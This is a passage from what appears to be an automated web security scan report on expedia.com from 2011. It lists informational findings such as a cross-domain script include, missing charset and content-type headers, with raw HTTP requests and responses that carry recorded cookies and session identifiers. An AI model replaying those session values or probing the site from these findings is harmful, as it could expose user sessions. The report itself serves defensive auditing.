                    <li><a href="http://www.expedia.de" title="Expedia.de" class="flag-de" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ie" title="Expedia.ie" class="flag-ie" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.it" title="Expedia.it" class="flag-it" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.nl" title="Expedia.nl" class="flag-nl" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.no" title="Expedia.no" class="flag-no" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.es" title="Expedia.es" class="flag-es" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.se" title="Expedia.se" class="flag-se" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<div id="footer-copyright" class="footer-list-container">
&copy;2011 <a href="http://www.expediainc.com/" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Copyright')">Expedia, Inc.</a>
...[SNIP]...

6.4. http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/scripts/exp/core/ChannelTracking.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /static/default/default/scripts/exp/core/ChannelTracking.js?v=1.1&v=release-2011-06-r1.2.191725 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"14441-1307726118848"
Last-Modified: Fri, 10 Jun 2011 17:15:18 GMT
Content-Type: text/javascript
Cteonnt-Length: 14441
Content-Length: 14441
Vary: Accept-Encoding
Cache-Control: private, max-age=71169
Date: Mon, 13 Jun 2011 11:26:58 GMT
Connection: close

//configuration --- can be put into separate file
//first flag indicates clear seoid
//second flag - null indicates check for SEMCID, true is to clear the cookie, false is don't clear the cookie
v
...[SNIP]...
/ footer        
       var footerDiv = document.getElementById('footer');
       var dynamicFooterDiv = document.createElement("div");
       dynamicFooterDiv.id = "msnnzFooterSuffix";
       dynamicFooterDiv.innerHTML = '<iframe scrolling=no frameborder=no style="height:65px; width:992px; border:none; overflow:hidden;" border="0" src="http://serviceslb-198436258.us-east-1.elb.amazonaws.com/Header/v1?pt=cobrand&partnerid=40654&pos=29&type=footer"></iframe>
...[SNIP]...

7. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/promos/deals/summervacationsale/default.asp

Issue detail

The response dynamically includes the following script from another domain:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003240&bpp=7&shv=r20110608&jsv=r20110607&correlator=1307964003248&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1065&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=1&dtd=21&xpc=5g2L9BvBMy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID1=AwCDeikAAAAA5ufnTf9NBgHm5-dNAQDm5-dNAAAAAAAAAADm5-dNAQAnAAAA-gQAAAI; MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; SSRT1=5-fnTQE; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 71777
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
Vary: Accept-Encoding
RTSS: 1
Content-Length: 71998
Date: Mon, 13 Jun 2011 11:26:51 GMT
Connection: close
Set-Cookie: SSRT1=-_P1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:26:51 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<div class="fb_like">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

8. HTML does not specify charset  previous  next
There are 4 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


8.1. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/prod/xmlgrid/loadingImage.asp

Request

GET /daily/prod/xmlgrid/loadingImage.asp HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; bn_u=5368708931696218534; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 163
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 163
Expires: Sat, 11 Dec 2010 18:02:39 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=DPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:08 GMT


<div style="text-align:center;padding:40px;">Loading deals...<br/><img src="http://www.expedia.com/eta/nocache/stampa.gif" alt="" WIDTH="82" HEIGHT="10"/></div>

8.2. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/prod/xmlgrid/psf/PsfGridActivities.asp

Request

GET /daily/prod/xmlgrid/psf/PsfGridActivities.asp?dest=New%20York%20City&promo=summersale2011&r=0.3934101234190166 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
ntCoent-Length: 1112
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 1112
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=1; path=/; domain=.expedia.com
Set-Cookie: SSRT1=EPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:12 GMT
Set-Cookie: ipsnf3=v.3|US|1|511|washington; expires=Wed, 13-Jun-2012 00:00:01 GMT; path=/; domain=.expedia.com;

<?xml version="1.0"?>
<div class="morewaysCustomTop"></div><div class="morewaysCustom"><div class="morewaysCustomInner"><div class="activityTitle">New York City Activities</div><div class="activityDe
...[SNIP]...

8.3. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp

Request

GET /daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp?7854 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 9539
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 9539
Expires: Sat, 11 Dec 2010 18:01:23 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=B_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:03 GMT


<style type="text/css">
body{padding:0;margin:0}
#PcoWrapper { font-family:Arial;width:416px;height:366px;padding:0px;margin:0px;}

.pcoImage {position:relative;width:416px;height:366px;}
.pc
...[SNIP]...

8.4. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp

Request

GET /daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp?7935 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 8630
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 8630
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=B_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:03 GMT


<style type="text/css">
body{padding:0;margin:0}
#PcoWrapper { font-family:Arial;width:308px;height:343px;padding:0px;margin:0px;}

.pcoImage {position:relative;width:308px;height:343px;}
.pc
...[SNIP]...

9. Content type incorrectly stated  previous  next
There are 2 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


9.1. http://www.expedia.com/daily/js/flash.vbs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /daily/js/flash.vbs

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /daily/js/flash.vbs HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Cteonnt-Length: 296
Content-Type: text/vbscript
Last-Modified: Thu, 16 Mar 2006 00:03:56 GMT
Accept-Ranges: bytes
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Content-Length: 296
Expires: Thu, 16 Mar 2006 00:03:56 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:20:34 GMT
Connection: close
Vary: Accept-Encoding

Function VBGetSwfVer(i)
   on error resume next
   Dim swControl, swVersion
   swVersion = 0

   set swControl = CreateObject("ShockwaveFlash.ShockwaveFlash." + CStr(i))
   if (IsObject(swControl)) then

...[SNIP]...

9.2. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /daily/prod/xmlgrid/psf/PsfGridActivities.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /daily/prod/xmlgrid/psf/PsfGridActivities.asp?dest=New%20York%20City&promo=summersale2011&r=0.3934101234190166 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
ntCoent-Length: 1112
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 1112
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=1; path=/; domain=.expedia.com
Set-Cookie: SSRT1=EPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:12 GMT
Set-Cookie: ipsnf3=v.3|US|1|511|washington; expires=Wed, 13-Jun-2012 00:00:01 GMT; path=/; domain=.expedia.com;

<?xml version="1.0"?>
<div class="morewaysCustomTop"></div><div class="morewaysCustom"><div class="morewaysCustomInner"><div class="activityTitle">New York City Activities</div><div class="activityDe
...[SNIP]...

10. Content type is not specified  previous
There are 9 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


10.1. http://www.expedia.com/static/default/default/images/close_button.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/close_button.gif

Request

GET /static/default/default/images/close_button.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"73-1306934938467"
Last-Modified: Wed, 01 Jun 2011 13:28:58 GMT
Content-Length: 73
Date: Mon, 13 Jun 2011 11:21:52 GMT
Connection: close

GIF89a...................!.......,...........T.i.    . z.2j.ngk,MO7...-.P..;

10.2. http://www.expedia.com/static/default/default/images/infosite/hotel_detail_rating_bar.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/hotel_detail_rating_bar.gif

Request

GET /static/default/default/images/infosite/hotel_detail_rating_bar.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
